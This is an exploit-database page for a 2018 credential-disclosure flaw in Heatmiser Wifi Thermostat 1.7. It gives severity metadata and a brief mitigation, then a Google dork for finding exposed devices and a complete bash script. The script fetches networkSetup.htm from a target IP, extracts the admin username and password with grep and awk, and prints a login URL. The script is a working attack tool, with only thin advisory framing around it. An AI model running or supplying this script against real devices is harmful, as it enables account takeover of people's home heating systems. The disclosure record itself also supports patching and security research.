Heatmiser Wifi Thermostat 1.7 - Credential Disclosure

vendor:

Heatmiser Wifi Thermostat

by:

d0wnp0ur

7.5

CVSS

HIGH

Credential Disclosure

200

CWE

Product Name: Heatmiser Wifi Thermostat

Affected Version From: 1.7

Affected Version To: 1.7

Patch Exists: YES

Related CWE: N/A

CPE: a:heatmiser:heatmiser_wifi_thermostat

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Heatmiser Version 1.7

2018

Heatmiser Wifi Thermostat 1.7 – Credential Disclosure

This exploit allows an attacker to gain access to the username and password of a vulnerable Heatmiser thermostat by using a wget command to copy the disclosing page and then using grep and awk commands to extract the credentials.

Mitigation:

Users should ensure that their Heatmiser thermostats are updated to the latest version and that they are using strong passwords.

Source

Exploit-DB raw data:

# Exploit Title: Heatmiser Wifi Thermostat 1.7 - Credential Disclosure 
# Dork: intitle:"Heatmiser Wifi Thermostat"
# Date: 2018-08-17
# Exploit Author: d0wnp0ur
# Original Discoverer: Andrew Tierney
# Vendor Lnk: https://www.heatmiser.com/en/ 
# Product Link: https://www.heatmiser.com/en/wireless-thermostats/
# Tested on: Heatmiser Version 1.7
# CVE: N/A

#!/bin/bash

echo Heatmiser Smart Thermometer Hack
echo By d0wnp0ur
echo Usage: $0 \<ip\[:port\]\> \(Default is 80. If it doesn\'t work, try port 8081\)
echo This tool gets the username and password of a vulnerable Heatmiser thermostat
echo Deleting old files
rm networkSetup.htm*
echo Copying disclosing page
wget http://$1/networkSetup.htm
echo Getting Username and Password
echo Username:
cat networkSetup.htm | grep "User" | grep "Name:" | awk -F 'value=' '{print $2}' | cut -d '"' -f 2
echo Password:
cat networkSetup.htm | grep "User" | grep "Password:" |grep -v -i "confirm" |  awk -F 'value=' '{print $2}' | cut -d '"' -f 2
echo Success! Log in to the web interface with the above credentials.
echo http://$1